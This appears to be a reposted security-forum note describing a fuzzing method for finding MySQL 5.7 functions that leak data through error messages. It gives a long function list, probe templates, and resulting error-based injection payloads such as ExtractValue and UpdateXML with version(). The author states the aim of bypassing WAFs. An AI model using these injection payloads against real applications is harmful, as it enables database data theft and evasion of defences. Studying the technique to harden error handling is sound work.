
Mysql报错注入简单测试模型


测试 MySQL 环境:MySQL 5.7.12-log,MySQL Community Server (GPL)

1、收集内置函数

http://dev.mysql.com/doc/refman/5.7/en/dynindex-function.html

2、整理列表


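-- Candidate name list for the probe templates in step 3, one statement per
-- line so that a paste into the mysql client executes them in sequence.
-- No arguments are supplied at this stage, so every statement here is
-- expected to fail; the list only exists to be rewritten by step 5.
-- The names were collected from the MySQL 5.7 function index linked above.
-- That index apparently also contributed entries that are not SQL functions
-- (e.g. add, addslashes, crypt, decr, delete, get, gethostbyaddr*,
-- gethostbyname*, getrusage, gettimeofday, incr, my_open, pthread_mutex,
-- set, setrlimit) and operator entries written as "expr IN ()" /
-- "NOT IN()"; those cannot be called as functions and yield nothing useful,
-- but are kept so the list matches its source.
-- MySQL function names are case-insensitive, so LENGTH/Length and
-- REPLACE/replace are duplicates of each other.
select ABS();
select ACOS();
select add();
select ADDDATE();
select addslashes();
select ADDTIME();
select AES_DECRYPT();
select AES_ENCRYPT();
select ANY_VALUE();
select Area();
select AsBinary();
select ASCII();
select ASIN();
select AsText();
select AsWKB();
select AsWKT();
select ASYMMETRIC_DECRYPT();
select ASYMMETRIC_DERIVE();
select ASYMMETRIC_ENCRYPT();
select ASYMMETRIC_SIGN();
select ASYMMETRIC_VERIFY();
select ATAN();
select ATAN2();
select AVG();
select BENCHMARK();
select BIN();
select BIT_AND();
select BIT_COUNT();
select BIT_LENGTH();
select BIT_OR();
select BIT_XOR();
select Buffer();
select CAST();
select CEIL();
select CEILING();
select Centroid();
select CHAR();
select CHAR_LENGTH();
select CHARACTER_LENGTH();
select CHARSET();
select E();
select COERCIBILITY();
select COLLATION();
select COMPRESS();
select CONCAT();
select CONCAT_WS();
select CONNECTION_ID();
select Contains();
select CONV();
select CONVERT();
select CONVERT_TZ();
select ConvexHull();
select COS();
select COT();
select COUNT();
select CRC32();
select CREATE_ASYMMETRIC_PRIV_KEY();
select CREATE_ASYMMETRIC_PUB_KEY();
select CREATE_DH_PARAMETERS();
select CREATE_DIGEST();
select Crosses();
select crypt();
select CURDATE();
select CURRENT_DATE();
select CURRENT_TIME();
select CURRENT_TIMESTAMP();
select CURRENT_USER();
select CURTIME();
select DATABASE();
select DATE();
select DATE_ADD();
select DATE_FORMAT();
select DATE_SUB();
select DATEDIFF();
select DAY();
select DAYNAME();
select DAYOFMONTH();
select DAYOFWEEK();
select DAYOFYEAR();
select DECODE();
select decr();
select DEFAULT();
select DEGREES();
select delete();
select DES_DECRYPT();
select DES_ENCRYPT();
select Dimension();
select Disjoint();
select Distance();
select ELT();
select ENCODE();
select ENCRYPT();
select EndPoint();
select Envelope();
select Equals();
select EXP();
select EXPORT_SET();
select expr IN ();
select expr NOT IN ();
select ExteriorRing();
select EXTRACT();
select ExtractValue();
select FIELD();
select FIND_IN_SET();
select FLOOR();
select FORMAT();
select FOUND_ROWS();
select FROM_BASE64();
select FROM_DAYS();
select FROM_UNIXTIME();
select GeomCollFromText();
select GeomCollFromWKB();
select GeometryCollection();
select GeometryCollectionFromText();
select GeometryCollectionFromWKB();
select GeometryFromText();
select GeometryFromWKB();
select GeometryN();
select GeometryType();
select GeomFromText();
select GeomFromWKB();
select get();
select GET_FORMAT();
select GET_LOCK();
select gethostbyaddr();
select gethostbyaddr_r();
select gethostbyname();
select gethostbyname_r();
select getrusage();
select gettimeofday();
select GLength();
select GREATEST();
select GROUP_CONCAT();
select GTID_SUBSET();
select GTID_SUBTRACT();
select HEX();
select HOUR();
select IF();
select IFNULL();
select IN();
select incr();
select INET6_ATON();
select INET6_NTOA();
select INET_ATON();
select INET_NTOA();
select INSERT();
select INSTR();
select InteriorRingN();
select Intersects();
select INTERVAL();
select IS_FREE_LOCK();
select IS_IPV4();
select IS_IPV4_COMPAT();
select IS_IPV4_MAPPED();
select IS_IPV6();
select IS_USED_LOCK();
select IsClosed();
select IsEmpty();
select ISNULL();
select IsSimple();
select JSON_APPEND();
select JSON_ARRAY();
select JSON_ARRAY_APPEND();
select JSON_ARRAY_INSERT();
select JSON_CONTAINS();
select JSON_CONTAINS_PATH();
select JSON_DEPTH();
select JSON_EXTRACT();
select JSON_INSERT();
select JSON_KEYS();
select JSON_LENGTH();
select JSON_MERGE();
select JSON_OBJECT();
select JSON_QUOTE();
select JSON_REMOVE();
select JSON_REPLACE();
select JSON_SEARCH();
select JSON_SET();
select JSON_TYPE();
select JSON_UNQUOTE();
select JSON_VALID();
select LAST_DAY();
select LAST_INSERT_ID();
select LCASE();
select LEAST();
select LEFT();
select LENGTH();
select Length();
select LineFromText();
select LineFromWKB();
select LineString();
select LineStringFromText();
select LineStringFromWKB();
select LN();
select LOAD_FILE();
select LOCALTIME();
select LOCALTIMESTAMP();
select LOCATE();
select LOG();
select LOG10();
select LOG2();
select LOWER();
select LPAD();
select LTRIM();
select MAKE_SET();
select MAKEDATE();
select MAKETIME();
select MASTER_POS_WAIT();
select MATCH();
select MAX();
select MBRContains();
select MBRCoveredBy();
select MBRCovers();
select MBRDisjoint();
select MBREqual();
select MBREquals();
select MBRIntersects();
select MBROverlaps();
select MBRTouches();
select MBRWithin();
select MD5();
select MICROSECOND();
select MID();
select MIN();
select MINUTE();
select MLineFromText();
select MLineFromWKB();
select MOD();
select MONTH();
select MONTHNAME();
select MPointFromText();
select MPointFromWKB();
select MPolyFromText();
select MPolyFromWKB();
select MultiLineString();
select MultiLineStringFromText();
select MultiLineStringFromWKB();
select MultiPoint();
select MultiPointFromText();
select MultiPointFromWKB();
select MultiPolygon();
select MultiPolygonFromText();
select MultiPolygonFromWKB();
select my_open();
select NAME_CONST();
select NOT IN();
select NOW();
select NULLIF();
select NumGeometries();
select NumInteriorRings();
select NumPoints();
select OCT();
select OCTET_LENGTH();
select OLD_PASSWORD();
select ORD();
select Overlaps();
select PASSWORD();
select PERIOD_ADD();
select PERIOD_DIFF();
select PI();
select Point();
select PointFromText();
select PointFromWKB();
select PointN();
select PolyFromText();
select PolyFromWKB();
select Polygon();
select PolygonFromText();
select PolygonFromWKB();
select POSITION();
select POW();
select POWER();
select pthread_mutex();
select QUARTER();
select QUOTE();
select RADIANS();
select RAND();
select RANDOM_BYTES();
select RELEASE_ALL_LOCKS();
select RELEASE_LOCK();
select REPEAT();
select REPLACE();
select replace();
select REVERSE();
select RIGHT();
select ROUND();
select ROW_COUNT();
select RPAD();
select RTRIM();
select SCHEMA();
select SEC_TO_TIME();
select SECOND();
select SESSION_USER();
select set();
select setrlimit();
select SHA();
select SHA1();
select SHA2();
select SIGN();
select SIN();
select SLEEP();
select SOUNDEX();
select SPACE();
select SQRT();
select SRID();
select ST_Area();
select ST_AsBinary();
select ST_AsGeoJSON();
select ST_AsText();
select ST_AsWKB();
select ST_AsWKT();
select ST_Buffer();
select ST_Buffer_Strategy();
select ST_Centroid();
select ST_Contains();
select ST_ConvexHull();
select ST_Crosses();
select ST_Difference();
select ST_Dimension();
select ST_Disjoint();
select ST_Distance();
select ST_Distance_Sphere();
select ST_EndPoint();
select ST_Envelope();
select ST_Equals();
select ST_ExteriorRing();
select ST_GeoHash();
select ST_GeomCollFromText();
select ST_GeomCollFromTxt();
select ST_GeomCollFromWKB();
select ST_GeometryCollectionFromText();
select ST_GeometryCollectionFromWKB();
select ST_GeometryFromText();
select ST_GeometryFromWKB();
select ST_GeometryN();
select ST_GeometryType();
select ST_GeomFromGeoJSON();
select ST_GeomFromText();
select ST_GeomFromWKB();
select ST_InteriorRingN();
select ST_Intersection();
select ST_Intersects();
select ST_IsClosed();
select ST_IsEmpty();
select ST_IsSimple();
select ST_IsValid();
select ST_LatFromGeoHash();
select ST_Length();
select ST_LineFromText();
select ST_LineFromWKB();
select ST_LineStringFromText();
select ST_LineStringFromWKB();
select ST_LongFromGeoHash();
select ST_MakeEnvelope();
select ST_MLineFromText();
select ST_MLineFromWKB();
select ST_MPointFromText();
-- The original list omitted the leading "select" on this line, so the
-- step-5 substitution would have produced a statement that never ran.
select ST_MPointFromWKB();
select ST_MPolyFromText();
select ST_MPolyFromWKB();
select ST_MultiLineStringFromText();
select ST_MultiLineStringFromWKB();
select ST_MultiPointFromText();
select ST_MultiPointFromWKB();
select ST_MultiPolygonFromText();
select ST_MultiPolygonFromWKB();
select ST_NumGeometries();
select ST_NumInteriorRing();
select ST_NumInteriorRings();
select ST_NumPoints();
select ST_Overlaps();
select ST_PointFromGeoHash();
select ST_PointFromText();
select ST_PointFromWKB();
select ST_PointN();
select ST_PolyFromText();
select ST_PolyFromWKB();
select ST_PolygonFromText();
select ST_PolygonFromWKB();
select ST_Simplify();
select ST_SRID();
select ST_StartPoint();
select ST_SymDifference();
select ST_Touches();
select ST_Union();
select ST_Validate();
select ST_Within();
select ST_X();
select ST_Y();
select StartPoint();
select STD();
select STDDEV();
select STDDEV_POP();
select STDDEV_SAMP();
select STR_TO_DATE();
select STRCMP();
select SUBDATE();
select SUBSTR();
select SUBSTRING();
select SUBSTRING_INDEX();
select SUBTIME();
select SUM();
select SYSDATE();
select SYSTEM_USER();
select TAN();
select TIME();
select TIME_FORMAT();
select TIME_TO_SEC();
select TIMEDIFF();
select TIMESTAMP();
select TIMESTAMPADD();
select TIMESTAMPDIFF();
select TO_BASE64();
select TO_DAYS();
select TO_SECONDS();
select Touches();
select TRIM();
select TRUNCATE();
select UCASE();
select UNCOMPRESS();
select UNCOMPRESSED_LENGTH();
select UNHEX();
select UNIX_TIMESTAMP();
select UpdateXML();
select UPPER();
select USER();
select UTC_DATE();
select UTC_TIME();
select UTC_TIMESTAMP();
select UUID();
select UUID_SHORT();
select VALIDATE_PASSWORD_STRENGTH();
select VALUES();
select VAR_POP();
select VAR_SAMP();
select VARIANCE();
select VERSION();
select WAIT_FOR_EXECUTED_GTID_SET();
select WAIT_UNTIL_SQL_THREAD_AFTER_GTIDS();
select WEEK();
select WEEKDAY();
select WEEKOFYEAR();
select WEIGHT_STRING();
select Within();
select X();
select Y();
select YEAR();
select YEARWEEK();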

3、构造测试模型


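-- Probe templates. "functionname" is a placeholder that step 5 replaces
-- with each name from the list in step 2; version() is the marker argument.
-- A probe counts as a hit in step 6 only when the server's error text
-- echoes the marker value back (the ERROR 1105 / 1411 / 1772 results
-- recorded below). The same observation is the defensive one: raw database
-- error text reaching the client is the channel, so an application should
-- log such errors server-side and return a generic failure to the caller.
-- One argument: marker in position 1.
select functionname(version());
-- Two arguments: marker in position 2, then position 1.
select functionname(1,version());
select functionname(version(),1);
-- Three arguments: marker in position 1, then position 2.
-- The original list repeated the (version(),1,1) form twice; the duplicate
-- is dropped here.
select functionname(version(),1,1);
select functionname(1,version(),1);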

4、在 mysql command line 中用 tee 设置 log 输出位置

tee Y:/sqllog.txt

5、用查找替换的方式,把 3 中模型里的 functionname 依次换成 2 中列表的每个函数名,然后把结果直接粘贴到 command line 里。

由于列表中每条语句后面都带换行,粘贴后这些 SQL 语句会依次执行。

6、在 log 文件中以 "-log" 为关键字搜索(version() 返回 '5.7.12-log',只有把参数值带进报错信息的函数才会命中),整理出有效的报错注入结果:

mysql> select ST_LatFromGeoHash(version());
ERROR 1411 (HY000): Incorrect geohash value: '5.7.12-log' for function ST_LATFROMGEOHASH
mysql> select ST_LongFromGeoHash(version());
ERROR 1411 (HY000): Incorrect geohash value: '5.7.12-log' for function ST_LONGFROMGEOHASH
mysql> select ExtractValue(1,version());
ERROR 1105 (HY000): XPATH syntax error: '.12-log'
mysql> select GTID_SUBSET(version(),1);
ERROR 1772 (HY000): Malformed GTID set specification '5.7.12-log'.
mysql> select GTID_SUBTRACT(version(),1);
ERROR 1772 (HY000): Malformed GTID set specification '5.7.12-log'.
mysql> select ST_PointFromGeoHash(version(),1);
ERROR 1411 (HY000): Incorrect geohash value: '5.7.12-log' for function st_pointfromgeohash
mysql> select UpdateXML(1,version(),1);
ERROR 1105 (HY000): XPATH syntax error: '.12-log'

感觉还不错。回头慢慢加大测试pattern看能不能得到更多有趣的结果。

这个如果详细测试出来结果,很多waf又可以被绕过了。

原文地址:

http://zone.wooyun.org/content/26631

